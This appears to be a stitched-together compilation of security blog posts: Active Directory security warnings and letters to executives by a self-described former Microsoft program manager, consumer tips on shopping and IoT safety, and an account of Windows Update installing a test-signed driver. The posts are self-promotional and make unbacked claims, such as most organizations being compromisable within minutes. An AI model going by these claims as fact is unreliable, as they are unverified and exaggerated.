If you read my words very carefully, as you always should, then you'll find that it shouldn't take an astute cyber security professional more than a minute to figure it out, given that I’ve actually already provided the answer above.
Today, the CISO of every organization in the world, whether it be a government, a military or a billion dollar company (of which there are dime a dozen, and in fact thousands worldwide) or a trillion dollar company MUST know the answer to this question.
They must know the answer because it directly impacts and threatens the foundational cyber security of their organizations.
If they don't, (in my opinion) they likely shouldn't be the organization's CISO because what I have shared above could possibly be the single biggest threat to 85% of organizations worldwide, and it could be used to completely compromise them within minutes (and any organization that would like a demo in their real-world environment may feel free to request one.)
Some of you will have figured it out. For the others, I'll finally shed light on the answer soon.
PS: If you need to know right away, perhaps you should give your Microsoft contact a call and ask them. If they too need some help (they likely will ;-)), tell them it has to do with a certain security descriptor in Active Directory. (There, now that's a HINT the size of a domain, and it could get an intruder who's been able to breach an organization's network perimeter to root in seconds.)
PS2: If this intrigues you, and you wish to learn more, you may want to read this - Hello World :-)
Today is January 06, 2020, and as promised, here I am getting back to sharing perspectives on cyber security.
Cyber Security 101
Perhaps a good topic to kick off the year is by seeking to ask and answer a simple yet vital question - What is Active Directory?
You see, while this question may seem simple to some (and it is,) its one of the most important questions to answer adequately, because in an adequate answer to this most simple question lies the key to organizational cyber security worldwide.
The simple reason for this is that if you were to ask most CISOs or IT professionals, they'll likely tell you that Active Directory is the "phone book" of an organization's IT infrastructure, and while its true that at its simplest, it is a directory of all organizational accounts and computers, it is this shallow view that leads organizations to greatly diminish the real value of Active Directory to the point of sheer irresponsible cyber negligence because "Who really cares about just a phone book?"
In fact, for two decades now, this has been the predominant view held by most CISOs and IT personnel worldwide, and sadly it is the negligence resulting from such a simplistic view of Active Directory that are likely the reason that the Active Directory deployments of most organizations remain substantially insecure and vastly vulnerable to compromise today.
Again, after all, who cares about a phone book?!
Active Directory - The Very Foundationof Organizational Cyber Security Worldwide
If as they say, a "A Picture is Worth a Thousand Words", perhaps I should paint you a very simple Trillion $ picture -
An organization's Active Directory deployment is its single most valuable IT and corporate asset, worthy of the highest protection at all times, because it is the very foundation of an organization's cyber security.
The entirety of an organization's very building blocks of cyber security i.e. all the organizational user accounts and passwords used to authenticate their people, all the security groups used to aggregate and authorize access to all their IT resources, all their privileged user accounts, all the accounts of all their computers, including all laptops, desktops and servers are all stored, managed and secured in (i.e. inside) the organization's foundational Active Directory, and all actions on them audited in it.
In other words, should an organization's foundational Active Directory, or a single Active Directory privileged user account, be compromised, the entirety of the organization could be exposed to the risk of complete, swift and colossal compromise.
Active Directory Security Must Be Organizational Cyber SecurityPriority #1
Today, ensuring the highest protection of an organization's foundational Active Directory deployment must undoubtedly be the #1 priority of every organization that cares about cyber security, protecting shareholder value and business continuity.
For anyone to whom this may still not be clear, I'll spell it out - just about everything in organizational Cyber Security, whether it be Identity and Access Management, Privileged Access Management, Network Security, Endpoint Security, Data Security, Intrusion Detection, Cloud Security, Zero Trust etc. ultimately relies and depends on Active Directory (and its security.)
In essence, today every organization in the world is only as secure as is its foundational Active Directory deployment, and from the CEO to the CISO to an organization's shareholders, employees and customers, everyone should know this cardinal fact.
I trust this finds you all doing well. It has been a few months since I last blogged - pardon the absence. I had to focus my energies on helping the world get some perspective, getting 007G ready for launch, and dealing with a certain nuisance.
Having successfully accomplished all three objectives, it is TIME to help defend organizations worldwide from the SPECTRE of potentially colossal compromise, which is a real cyber security risk that looms over 85% of organizations worldwide.
When you know as much as I do, care as much as I do, and possess as much capability as I do, you not only shoulder a great responsibility, you almost have an obligation to educate the whole world about cyber security risks that threaten their security.
So, even though I barely have any time to do this, in the interest of foundational cyber security worldwide, I'm going to start sharing a few valuable perspectives again, and do so, on this blog, that blog and the official PD blog (;see below.)
Stay tuned for some valuable cyber security insights right here from January 06, 2020 and let me take your leave with a befitting (and one of my favorite) song(s) -
Best wishes, Sanjay.
PS: Just a month ago, the $ Billion Czech cyber security company Avast was substantially compromised, and guess what the perpetrators used to compromise them? They used the EXACT means I had clearly warned about TWO years ago, right here.
Everything we do on a daily basis has some form of “trust” baked into it. Where you live, what kind of car you drive, where you send your children to school, who you consider good friends, what businesses you purchase from, etc. Trust instills a level of confidence that your risk is minimized and acceptable to you. Why should this philosophy be any different when the entity you need to trust is on the other end of an Internet address? In fact, because you are connecting to an entity that you cannot see or validate, a higher level of scrutiny is required before they earn your trust. What Universal Resource Locator (URL) are you really connecting to? Is it really your banking website or new online shopping website that you are trying for the first time? How can you tell?
It’s a jungle out there. So we’ve put together five ways you can stay safe while you shop online:
Shop at sites you trust. Are you looking at a nationally or globally recognized brand? Do you have detailed insight into what the site looks like? Have you established an account on this site, and is there a history that you can track for when you visit and what you buy? Have you linked the valid URL for the site in your browser? Mistyping a URL in your browser for any site you routinely visit can lead you to a rogue website.
Use secure networks to connect. Just as important as paying attention to what you connect to is to be wary of where you connect from. Your home Wi-Fi network that you trust—okay. An open Wi-Fi at an airport, cyber café, or public kiosk—not okay. If you can’t trust the network, do not enter identifying information or your payment card information. Just ask our cybersecurity services experts to demonstrate how easy it is to compromise an open Wi-Fi network, and you’ll see why we recommend against public Wi-Fi for sensitive transactions.
Perform basic checks in your browser. Today’s modern browsers are much better at encrypted and secure connections than they were a few years ago. They use encrypted communication by leveraging a specific Internet protocol, hypertext transfer protocol secure (HTTPS). This means that there is a certificate associated with this site in your browser that is verified before you are allowed to connect and establish the encrypted channel. (Just so you know, yes, these certificates can be spoofed, but that is a problem for another day). How do you check for this certificate? Look up in your browser title bar.
Create strong password for your shopping sites. This issue is covered in another blog post, but use longer passwords, 10–12 characters, and keep them in a safe place that cannot be compromised by an unauthorized person. If a second factor is offered, use it. Many sites will send you a code to your smartphone to type into a login screen to verify you are who you say you are.
Don’t give out information about yourself that seems unreasonable. If you are being asked for your social security number, think long and hard, and then longer and harder, about why that information should be required. And then don’t do it until you ask a trusted source about why that would be necessary. Be wary of anything you see when you are on a website that does not look familiar or normal.
We all use the Internet to shop. It is super convenient, and the return on investment is awesome. Having that new cool thing purchased in 10 minutes and delivered directly to your door—wow! Can you ever really be 100% sure that the Internet site you are visiting is legitimate, and that you are not going to inadvertently give away sensitive and/or financial information that is actually going directly into a hacker’s data collection file? Unfortunately, no. A lot of today’s scammers are very sophisticated. But as we discussed up front, this is a trust- and risk-based decision, and if you are aware that you could be compromised at any time on the Internet and are keeping your eyes open for things that just don’t look right or familiar, you have a higher probability of a safe online shopping experience.
Visit and use sites you know and trust
Keep the correct URLs in your bookmarks (don’t risk mistyping a URL).
Check the certificate to ensure your connection to the site is secured by a legitimate and active certificate.
Look for anything that is not familiar to your known experience with the site.
If you can, do not save credit card or payment card information on the site. (If you do, you need to be aware that if that site is breached, your payment data is compromised.)
Use strong passwords for your shopping site accounts. And use a different password for every site. (No one ring to rule them all!)
If a site offers a second factor to authenticate you, use it.
Check all your payment card statements regularly to look for rogue purchases.
Subscribe to an identity theft protection service if you can. These services will alert you if your identity has been compromised.
start this conversation out with the definition of device. The list of what
constitutes one is growing. For now, let’s say that you have a home computer
(desktop, laptop, or both), work computer (desktop, laptop, or both), home
tablet, work tablet, personal smartphone, and work smartphone. This is a pretty
extensive list of devices that an adversary could use to attack you professionally
and personally. But what about your Amazon Alexa or gadgets, smart toys, and
smart clocks? What about Google Assistant or Microsoft Cortana? Do you also
have a SmartTV? What about NEST, Wink, WeMo, SensorPush, Neurio, ecobee4,
Philips Hue, Smart Lock, GarageMate? Hoo boy! The list of connected devices goes
on and on.
of these devices safe to use? Well, the simple answer is no—unless you
specifically paid attention to its security. Also, for your smart devices that
work via voice control, do you know who might be listening on the other end? To
make things worse, many of these devices are also used in the corporate world,
because they are easy to deploy, and are very affordable.
about applications? Did the developer that created the application you are
using ensure they used good secure coding techniques? Or is there a likelihood
they introduced a flaw in their code? Are the servers for the application you
are running in the cloud secure? Is the data you are storing on these cloud
systems protected from unauthorized access?
really good questions we rarely ask ourselves—at least before we use the latest
and coolest applications available. We all make risk-based decisions every day,
but do we ever ensure we have all the data before we make that risk-based
What Can You Do?
by doing whatever homework and research you can. Make sure you understand the
social engineering methods that the malicious actors are currently using. Unsolicited
phone calls from a government agency (like the IRS), a public utility, or even
Microsoft or Apple are not legitimate. No you don’t owe back taxes, no your
computer has not been hacked, no you don’t need to give out sensitive personal
information to your power company over the phone.
How Can You Choose Safe Applications?
“Is this <name of application> secure?” Never install an application that
you don’t feel you can trust. Using an application is all about risk
management. Make sure you understand the potential risk to device and data
compromise, prior to choosing to use it.
How Can You Better Secure Your Home Network?
installation of any device, immediately change the login and password. These
are often stored in the configuration files that come with the product,
therefore are easy to look up.
login and password on your home Wi-Fi router frequently.
software for anything that connects is up to date.
Make sure you
have a clear sense of where your sensitive data is stored—and how it is
protected. Is it adequately protected—or, better yet, encrypted?
When in doubt, don’t
connect an IoT device to the Internet.
Lastly, look at some solutions that can be added to your home Wi-Fi network, that provide additional layers of protection and detection against IoT and other advanced attacks. F-Secure Sense Gadget is one such solution, as is Luma smart Wi-Fi router, Dojo, and CUJO. Dojo, for example, monitors all incoming and outgoing traffic and performs analysis looking for malicious traffic. With known weaknesses in IoT and home networks in general, solutions like the above are a good investment.
Don’t Give Hackers Easy Access
Not long ago, a casino in the Northeast had a fish tank in their lobby. To make management of the fish tank easier, they installed an IoT-enabled thermostatic control to set and monitor water temperature in the tank. The thermostatic control was connected to their internal network, as well as IoT-enabled to allow easy access from anywhere on the Internet. The device was breached from the Internet by malicious actors, and the internal network was penetrated, allowing the hackers to steal information from a high-roller database before devices monitoring the network were able to identify the unauthorized data leaving the network and shut it down. A classic case of what can happen without the right due diligence.
Try and follow this motto. Just because you can, does not mean you should. The latest shiny IT gadget that will make you seem cool, or potentially make some portion of your life easier to manage, should be evaluated thoroughly for security weaknesses, before you turn it on and open it up to the world. Make that good risk-based decision. Not many of us would consider doing this: “Hey Alexa, open up my desktop computer so that all my sensitive data is opened for all the world to see.” Or would we?
This week, the famous RSA Conference 2019is underway, where supposedly "The World Talks Security" -
If that's the case, let's talk - I'd like to respectfully ask the entire RSA Conference just 1 simple cyber security question -
Question: What lies at the very foundation of cyber security and privileged access of not just the RSAs, EMCs, Dells, CyberArks, Gartners, Googles, Amazons, Facebooks and Microsofts of the world, but also at the foundation of virtually all cyber security and cloud companies and at the foundation of over 85% of organizations worldwide?
For those who may not know the answer to this ONE simple cyber security question, the answer's in line 1 here.
For those who may know the answer, and I sincerely hope that most of the world's CIOs, CISOs, Domain Admins, Cyber Security Analysts, Penetration Testers and Ethical Hackers know the answer, here are 4 simple follow-up questions -
Q 1. Should your organization's foundational Active Directory be compromised, what could be its impact?
Q 2. Would you agree that the (unintentional, intentional or coerced) compromise of a single Active Directory privileged user could result in the compromise of your organization's entire foundational Active Directory?
Q 3. If so, then do you know that there is only one correct way to accurately identify/audit privileged users in your organization's foundational Active Directory, and do you possess the capability to correctly be able to do so?
Q 4.If you don't, then how could you possibly know exactly how many privileged users there are in your organization's foundational Active Directory deployment today, and if you don't know so, ...OMG... ?!
You see, if even the world's top cyber security and cloud computing companies themselves don't know the answers to such simple, fundamental Kindergarten-level cyber security questions, how can we expect 85% of the world's organizations to know the answer, AND MORE IMPORTANTLY, what's the point of all this fancy peripheral cyber security talk at such conferences when organizations don't even know how many (hundreds if not thousands of) people have the Keys to their Kingdom(s)?!
Today Active Directory is at the very heartof Cyber Security and Privileged Access at over 85% of organizations worldwide, and if you can find me even ONE company at the prestigious RSA Conference 2019 that can help organizations accurately identify privileged users/access in 1000s of foundational Active Directory deployments worldwide, you'll have impressed me.
Those who truly understand Windows Security know that organizations can neither adequately secure their foundational Active Directory deployments nor accomplish any of these recent buzzword initiatives like Privileged Access Management, Privileged Account Discovery, Zero-Trust etc. without first being able to accurately identify privileged users in Active Directory.
Today's post is for all executives worldwide who comprise the C-Suite at thousands of organizations worldwide.
I pen today's post with profound respect for all executives worldwide, because I understand first-hand just how important the nature of their responsibilities is, how valuable their time is, and how far-reaching the consequences of their decisions are.
A quick footnote for all C*Os : In case you're wondering who I am to be penning this, I'm former Microsoft Program Manager for Active Directory Security. Relevance? Microsoft's Active Directory is the foundation of your entire organization's cyber security. Finally, like you, I also happen to be the CEO of a $ Billion+ company.
Today's post is in the form of a simple letter, that follows (below.)
Subject - Cyber Security 101 for the C-Suite
To: Chairmen, CEOs and CFOs Worldwide
Hi, I'm Sanjay, former Microsoft Program Manager for Active Directory Security, but more importantly a sincere well-wisher who cares deeply about cyber security, and who just happens to know a thing or two about the very technology that lies at the very foundation of cyber security of your ($ Billion to $ Trillion) organization, and those of 85% of all organizations worldwide.
I write to you to bring to your attention a matter of paramount importance to your organization's foundational security.
Context - Foundational Security
Today we all engage in business in what is essentially a global digital village, wherein just about just every aspect of business, whether it be production, marketing, sales, customer-service, collaboration, finance etc. etc. substantially relies on technology.
Within our respective organizations, it is our IT infrastructure that enables and empowers our workforce to engage in business.
For instance, we all (including us C*Os) log on to a computer every day, send and receive email, and create, share and access digital assets (e.g. documents, applications, services etc.) all of which are securely stored on our organizational computers.
It is only logical then that ensuring the security of the very IT infrastructure that enables and empowers our entire workforce to engage in business digitally, and the security of our digital assets is vital. In other words, cyber security is very important.
Now, if I told you that at the very foundation of your entire IT infrastructure, and consequently at the very foundation of the security of all your digital assets lay a single high-value asset, then I think you'd agree that its security would be paramount.
At the very foundation of your organization's IT infrastructure and that of its cyber security, and by corollary the cyber security of the entirety of all your digital assets (e.g. thousands of computers, thousands of employee user accounts and passwords, every single organizational email sent and received every minute of every day, all your applications, services, Intranet portals, Internet facing applications etc.) as well as the entirety of your organization's data, lies a single technology - Microsoft Active Directory.
Most simply put, Active Directory is the database that contains, stores and protects the entirety of your organization's building blocks of cyber security - each one of thousands of user accounts and their passwords, each one of thousands of computer accounts (for all laptops, desktops, servers etc.), each one of thousands of security groups that protect all your data etc. etc.
If your organization's Active Directory were compromised, everything would immediately be exposed to the risk of compromise.
Thus as you'll hopefully agree, ensuring the security of your organization's foundational Active Directory is well, paramount.
A Provable Concern - Inadequate Protection
Now, you might most likely be thinking - Well, if that's the case, I'm sure that our CIO, our CISO and their world-class IT and Cyber Security teams know all this, and have it adequately taken care of, so why should I be concerned ?
Here's why you should be concerned - In all likelihood, not only may your world-class IT and Cyber Security teams not have this adequately covered, they may have yet to realize just how very important, and in fact paramount Active Directory security is.
Further, they likely may not know what it actually takes to adequately secure your organization's foundational Active Directory.
Now, as incredulous as that may sound, you have to trust me on this, not because I'm asking you to do so as a concerned well-wisher, but because I'm asking you to do so as arguably the world's #1 subject matter expert on Active Directory Security.
You see, prior to doing what I currently do, I was Microsoft's subject matter expert for Active Directory Security on Microsoft's Windows Server Development team. In case you're curious as to what I do currently do with all this knowledge, well, its this.
As the world's leading subject matter expert on Active Directory Security, I would highly encourage you to ask your IT and Cyber Security leadership, specifically your CIO and your CISO, just how secure they think your organization's Active Directory is.
Simple Proof - You Just Have to Ask
When you ask them about it, please do request specific answers, and here are 7 simple questions you can ask them, the answers to which will give you an indication of just how secure your organization's Active Directory actually is today -
Is the security of our foundational Active Directory deployment a top cyber security priority today?
I could suggest 50 such elemental cyber security questions, but for now these 7 simple, precise questions will suffice as there are only 2 possibilities here - either your IT and cyber security leadership have exact answers to these questions, or they don't.
If they can't give you exact answers to these questions, your organization's Active Directory is not secure - its as simple as that.
They might tell you that this is complicated or that they have a good approximation, or that this is very difficult to do, or that they have many other latest buzzword measures like Active Directory Auditing, Privileged Access Management, ATA, Just-in-Time Administration etc. in place, but none of that matters, because the truth is simple - they either have exact answers, or they don't.
(These questions are paramount to cyber security, and today there exists technology that can enable every organization in the world to answer them precisely, but because Microsoft likely forgot to adequately educate its customers, your IT personnel may likely not even know the importance of these paramount questions, let alone knowing what it takes to correctly answer them.)
If a $Billion+ organization doesn't even know exactly who has what privileged access in their Active Directory, as well as exactly who can manage each one of their privileged accounts and groups, how could their Active Directory possibly be secure?
If an organization's foundational Active Directory is not secure, how can the entirety of the organization's digital (IT) assets be secure, and if that's not case, how could an organization possibly be considered secure from a cyber security perspective?
As a member of the C-Suite, you not only have the privilege of being able to impact vital change in your organization, you also have the responsibility and the authority to demand and ensure the cyber security of the very foundation of your organization.
As a C*O, one of the most important responsibilities you shoulder is ensuring that your organization is secure, and ensuring that the very foundation of your organization's IT infrastructure and cyber security are always adequately protected, is paramount.
The Likely Reason (Optional Reading)
Here's the likely reason for why such a common-sense yet paramount matter may not be on your CIO's and CISO's radar yet.
You see, your CIO and CISO shoulder great responsibility. Unfortunately, amongst many other things, they're likely also being guided by inputs from a 1000 cyber security companies, who unfortunately may not be the best source of objective guidance.
For instance, consider CyberArk, a highly respected $ Billion+ cyber security company, that claims that over 50% of the Fortune 100's CISOs rely on them. As a subject matter expert, I can tell you that CyberArk itself may not know how to correctly assess privileged access in an Active Directory, so you see, unfortunately your CIO and CISO may not be getting the best guidance.
CyberArk is absolutely correct that "Privilege is Everywhere." However, those who know Windows Security will tell you that in a Windows network powered by Active Directory, the majority of all privileged access (delegated & unrestricted) lies inside Active Directory, but CyberArk doesn't seem to have the capability to correctly audit privileged access inside Active Directory.
The majority of all Privileged Access,including the "Keys to the Kingdom", resides inside Active Directory
CyberArk isn't alone. As unbelievable as it may sound, today even Microsoft doesn't seem to know what it takes to do so, let alone possessing the capability to help its customers correctly do so. In fact, most of the world's top IT Consulting, Audit, Cloud and Cyber Security companies also operate on Active Directory, and they too likely have neither a clue nor the capability to accurately determine exactly who has what privileged access in their own foundational Active Directory deployments.
You may find this hard to believe, but of the 1000+ cyber security companies exhibiting or presenting at the upcoming RSA Conference 2019, not a single one of them can help your organization's IT personnel fulfill such a fundamental yet paramount cyber security need - finding out exactly who has what privileged access in your organization's foundational Active Directory.
In their defense, I'll say this - if it were easy, they would've all done it by now. Unfortunately, as paramount as it is, its not easy. Thus, I know what your CIO and CISO may perhaps not yet know, or understand the paramount importance of, which is that of all the things that need to be secured, none could possibly be more important than securing your organization's foundational Active Directory, so I thought I'd share this with you, because as a member of the C-Suite, you could provide them strategic guidance and the executive support that their teams need to accomplish this paramount objective for your organization.
I only wrote this letter because we're all in this together, and I care deeply about foundational cyber security, as hopefully do you, and I felt that I could perhaps help bridge the gap between those tasked with the great responsibility of securing Active Directory (i.e. your IT personnel) and those whose executive support they need to be able to do so (i.e. you, the C-Suite.)
If any of what I shared above made sense, I would encourage you to embrace my suggestions earnestly, and act upon them, and if needed, I can prove and demonstrate every thing I've shared above, and you should feel free to take me up on this.
As for myself, all I can say is that today my work and knowledge silently help secure and defend so many of the world's most important organizations across six continents worldwide.
In days to come, I'm going to answer both, the most important, and the second most important question in all of Cyber Security
Today though, I just wanted to ask a simple (rhetorical) cyber security question, so that CEOs, CIOs, CISOs and IT Directors at organizations worldwide realize just what lies at the very foundation of the cyber security of their multi-billion $ organizations.
Consequently, it logically follows that all organizations that operate on Microsoft Active Directory are only as secure as are their foundational Active Directory deployments. After all, no matter how tall, every skyscraper is only as strong as its foundation.
In days to come, I'll share with you just how secure foundational Active Directory deployments are worldwide today - right here.
Today, to give a hint for the answer to this1 question, I asked possibly the most important cyber security question in the world, one that directly impacts the foundational security of 1000s of organizations worldwide, and thus one that impacts the financial security of billions of people worldwide -
What's the World's Most Important Active Directory Security Capability?
Given what it is I do, I don't squander a minute of precious time, unless something is very important, and this is very important.
Let me explain why this is so alarming, concerning and so important to cyber security, and why at many organizations (e.g. U.S. Govt., Paramount Defenses etc.), this could've either possibly resulted in, or in itself, be considered a cyber security breach.
Disclaimer: I'm not making any value judgment about Lenovo ; I'm merely basing this on what's already been said.
As you know, Microsoft's been brazenly leaving billions of people and thousands of organizations worldwide with no real choice but to upgrade to their latest operating system, Windows 10, which albeit is far from perfect, is much better than Windows Vista, Windows 8 etc., even though Windows 10's default settings could be considered an egregious affront to Privacy.
Consequently, at Paramount Defenses, we too felt that perhaps it was time to consider moving on to Windows 10, so we too figured we'd refresh our workforce's PCs. Now, of the major choices available from amongst several reputable PC vendors out there, Microsoft's Surface was one of the top trustworthy contenders, considering that the entirety of the hardware and software was from the same vendor (, and one that was decently trustworthy (considering that most of the world is running their operating system,)) and that there seemed to be no* pre-installed drivers or software that may have been written in China, Russia etc.
Side-note: Based on information available in the public domain, in all likelihood, software written in / maintained from within Russia, may still likely be running as System on Domain Controllers within the U.S. Government.
So we decided to consider evaluating Microsoft Surface devices and thus purchased a couple of brand-new Microsoft Surface devices from our local Microsoft Store for an initial PoC, and I decided to personally test-drive one of them -
The very first thing we did after unsealing them, walking through the initial setup and locking down Windows 10's unacceptable default privacy settings, was to connect it to the Internet over a secure channel, and perform a Windows Update.
I should mention that there was no other device attached to this Microsoft Surface, except for a Microsoft Signature Type Cover, and in particular there were no mice of any kind, attached to this new Microsoft surface device, whether via USB or Bluetooth.
Now, you're not going to believe what happened within minutes of having clicked the Check for Updatesbutton!
Windows Update Downloaded and Installed anUntrusted Self-Signed Lenovo Device Driver on Microsoft Surface! -
Within minutes, Windows Update automatically downloaded and had installed, amongst other packages (notably Surface Firmware,) an untrusted self-signed Kernel-mode device-driver, purportedly Lenovo - Keyboard, Other hardware - Lenovo Optical Mouse (HID), on this brand-new Microsoft Surface device, i.e. one signed with an untrusted WDK Test Certificate!
Here's a snapshot of Windows Update indicating that it had successfully downloaded and installed a Lenovo driver on this Surface device, and it specifically states "Lenovo - Keyboard, Other hardware - Lenovo Optical Mouse (HID)" -
We couldn't quite believe this. How could this be possible? i.e. how could a Lenovo driver have been installed on a Microsoft Surface device?
So we checked the Windows Update Log, and sure enough, as seen in the snapshot below, the Windows Update Log too confirmed that Windows Update had just downloaded and installed a Lenovo driver -
We wondered if there might have been any Lenovo hardware components installed on the Surface so we checked the Device Manager, and we could not find a single device that seemed to indicate the presence of any Lenovo hardware. (Later, we even took it back to the Microsoft Store, and their skilled tech personnel confirmed the same finding i.e. no Lenovo hardware on it.)
Specifically, as you can see below, we again checked the Device Manager, this time to see if it might indicate the presence of any Lenovo HID, such as a Lenovo Optical Mouse, and as you can see in the snapshot below, the only two Mice and other pointing devices installed on the system were from Microsoft - i.e. no Lenovo mouse presence indicated by Device Manager -
Next, we performed a keyword search of the Registry, and came across a suspicious Driver Package, as seen below -
It seemed suspicious to us because as can be seen in the snapshot above, all of the other legitimate driver package keys in the Registry had (as they should) three child sub-keys i.e. Configurations, Descriptors and Strings, but this specific one only had one subkey titled Properties, and when we tried to open it, we received an Access Denied message!
As you can see above, it seemed to indicate that the provider was Lenovo and that the INF file name was phidmou.inf, and the OEM path was "C:\Windows\SoftwareDistribution\Download\Install", so we looked at the file system but this path didn't seem to exist on the file-system. So we performed a simple file-system search "dir /s phidmou.*" and as seen in the snapshot below, we found one instance of such a file, located in C:\Windows\System32\DriverStore\FileRepository\.
Here's that exact location on the file-system, and as evidenced by the Created date and time for that folder, one can see that this folder (and thus all of its contents), were created on April 01, 2018 at around 1:50 am, which is just around the time the Windows Update log too confirmed that it had installed the Lenovo Driver -
When we opened that location, we found thirteen items, including six drivers -
Next, we checked the Digital Signature on one of the drivers, PELMOUSE.SYS, and we found that it was signed using a self-signed test Windows Driver certificate, i.e. the .sys files were SELF-SIGNED by a WDKTestCert and their digital signatures were NOT OK, in that they terminated in a root certificate that is not trusted by the trust provider -
Finally, when we clicked on the View Certificate button, as can be seen below, we could see that this driver was in fact merely signed by a test certificate, which is only supposed to be used for testing purposes during the creation and development of Kernel-mode drivers. Quoting from Microsoft's documentation on Driver Testing "However, eventually it will become necessary to test-sign your driver during its development, and ultimately release-sign your driver before publishing it to users." -
Clearly, the certificate seen above is NOT one that is intended to be used for release signing, yet, here we have a Kernel-mode driver downloaded by Windows Update and installed on a brand new Microsoft surface, and all its signed by is a test certificate, and who knows who wrote this driver!
Again, per Microsoft's guidelines on driver signing, which can also be found here, "After completing test signing and verifying that the driver is ready for release, the driver package has to be release signed", and AFAIK, release signing not only requires the signer to obtain and use a code-signing certificate from a code-signing CA, it also requires a cross cert issued by Microsoft.
If that is indeed the case, then a Kernel-mode driver that is not signed with a valid code-signing certificate, and one whose digital signature does not contain Microsoft's cross cert, should not even be accepted into the Windows Update catalog.
It is thus hard to believe that a Windows Kernel-Mode Driver that is merely self-signed using a test certificate would even make it into the Windows Update catalog, and further it seems that in this case, not only did it make it in, it was downloaded, and in fact successfully installed onto a system, which clearly seems highly suspicious, and is fact alarming and deeply-concerning!
How could this be? How could Windows Update (a trusted system process of the operating system), which we all (have no choice but to) trust (and have to do so blindly and completely) have itself installed an untrusted self-signed Lenovo driver (i.e. code running in Kernel-Mode) on a Microsoft Surface device?
Frankly, since this piece of software was signed using a self-signed test cert, who's to say this was even a real Lenovo driver? It could very well be some malicious code purporting to be a Lenovo driver. Or, there is also the remote possibility that it could be a legitimate Lenovo driver, that is self-signed, but if that is the case, its installation should not have been allowed to succeed.
To us, this is unacceptable, alarming and deeply concerning, and here's why.
We just had, on a device we consider trustworthy (, and could possibly have engaged in business on,) procured from a vendor we consider trustworthy (considering that the entire world's cyber security ultimately depends on them), an unknown, unsigned piece of software of Chinese origin that is now running in Kernel-mode, installed on the device, by this device's vendor's (i.e. Microsoft's) own product (Windows operating system's) update program!
We have not had an opportunity to analyze this code, but if it is indeed malicious in any way, in effect, it would've, unbeknownst to us and for no fault of ours, granted System-level control over a trusted device within our perimeter, to some entity in China.
How much damage could that have caused? Well, suffice it to say that, for they who know Windows Security well, if this was indeed malicious, it would've been sufficient to potentially compromise any organization within which this potentially suspect and malicious package may have been auto-installed by Windows update. (I've elaborated a bit on this below.)
In the simplest scenario, if a company's Domain Admins had been using this device, it would've been Game Over right there!
This leads me to the next question - we can't help but wonder how many such identical Surface devices exist out there today, perhaps at 1000s of organizations, on which this suspicious unsigned Lenovo driver may have been downloaded and installed?
This also leads me to another very important question - Just how much trust can we, the world, impose in Windows Update?
In our case, it just so happened to be, that we happened to be in front of this device during this Windows update process, and that's how we noticed this, and by the way, after it was done, it gave the familiar Your device is upto date message.
Speaking which, here's another equally important question - For all organizations that are using Windows Surface, and may be using it for mission-critical or sensitive purposes (e.g. AD administration), what is the guarantee that this won't happen again?
I ask because if you understand cyber security, then you know, that it ONLY takes ONE instance of ONE malicious piece of software to be installed on a system, to compromise the security of that system, and if that system was a highly-trusted internal system (e.g. that machine's domain computer account had the "Trusted for Unconstrained Delegation" bit set), then this could very likely also aid perpetrators in ultimately gaining complete command and control of the entire IT infrastructure. As I have already alluded to above, if by chance the target/compromised computer was one that was being used by an Active Directory Privileged User, then, it would be tantamount to Game Over right then and there!
Think about it - this could have happened at any organization, from say the U.S. Government to the British Government, or from say a Goldman Sachs to a Palantir, or say from a stock-exchange to an airline, or say at a clandestine national security agency to say at a nuclear reactor, or even Microsoft itself. In short, for absolutely no fault of theirs, an organization could potentially have been breached by a likely malicious piece of software that the operating system's own update utility had downloaded and installed on the System, and in 99% of situations, because hardly anyone checks what gets installed by Windows Update (now that we have to download and install a whopping 600MB patch every Tuesday), this would likely have gone unnoticed!
Again, to be perfectly clear, I'm not saying that a provably malicious piece of software was in fact downloaded and installed on a Microsoft Surface device by Windows Update. What I'm saying is that a highly suspicious piece of software, one that was built and intended to run in Kernel-mode and yet was merely signed with a test certificate, somehow was automatically downloaded and installed on a Microsoft Surface device, and that to us is deeply concerning, because in essence, if this could happen, then even at organizations that may be spending millions on cyber security, a single such piece of software quietly making its way in through such a trusted channel, could possibly instantly render their entire multi-million dollar cyber security apparatus useless, and jeopardize the security of the entire organization, and this could happen at thousands of organizations worldwide.
With full respect to Microsoft and Mr. Nadella, this is deeply concerning and unacceptable, and I'd like some assurance, as I'm sure would 1000s of other CEOs and CISOs, that this will never happen again, on any Surface device, in any organization.
In our case, this was very important, because had we put that brand new Surface device that we procured from none other than the Microsoft Store, into operation (even it we had re-imaged it with an ultra-secure locked-down internal image), from minute one, post the initial Windows update, we would likely have had a potentially compromised device running within our internal network, and it could perhaps have led to us being breached.
If I Were Microsoft, I'd Send a Plane Dear Microsoft, we immediately quarantined that Microsoft Surface device, and we have it in our possession.
If I were you, I'd send a plane to get it picked up ASAP, so you can thoroughly investigate every little aspect of this to figure out how this possibly happened, and get to the bottom of it! (Petty process note: The Microsoft Store let us keep the device for a bit longer, but will not let us return the device past June 24, and the only reason we've kept it, is in case you'd want to analyze it.) Here's why. At the very least, if I were still at Microsoft, and in charge of Cyber Security -
I'd want to know how an untrusted Kernel-mode device driver made it into the Windows Catalog
I'd want to know why a Microsoft Surface device downloaded a purportedly Lenovo driver
I'd want to know how Windows 10 permitted and in fact itself installed an untrusted driver
I'd want to know exactly which SKUs of Microsoft Surface this may have happened on
I'd want to know exactly how many such Microsoft Surface devices out there may have downloaded this package
Further, and as such, considering that Microsoft Corp itself may easily have thousands of Surface devices being used within Microsoft itself, if I were still with Microsoft CorpSec, I'd certainly want to know how many of their own Surface devices may have automatically downloaded and installed this highly suspicious piece of untrusted self-signed software.
In short, Microsoft, if you care as deeply about cyber security as you say you do, and by that I'm referring to what Mr. Nadella, the CEO of Microsoft, recently said (see video below: 0:40 - 0:44) and I quote "we spend over a billion dollars of R&D each year, in building security into our mainstream products", then you'll want to get to the bottom of this, because other than the Cloud, what else could be a more mainstream product for Microsoft today than, Microsoft Windows and Microsoft Surface ?! -
Folks, the only reason I decided to publicly share this is because I care deeply about cyber security, and I believe that this could potentially have impacted the foundational cyber security of any, and potentially, of thousands of organizations worldwide.
Hopefully, as you'll agree, a trusted component (i.e. Windows Update) of an operating system that virtually the whole world will soon be running on (i.e. Windows 10), should not be downloading and installing a piece of software that runs in Kernel-mode, when that piece of software isn't even digitally signed by a valid digital certificate, because if that piece of software happened to be malicious, then in doing so, it could likely, automatically, and for no fault of its users, instantly compromise the cyber security of possibly thousands of organizations worldwide. This is really as simple, as fundamental and as concerning, as that.
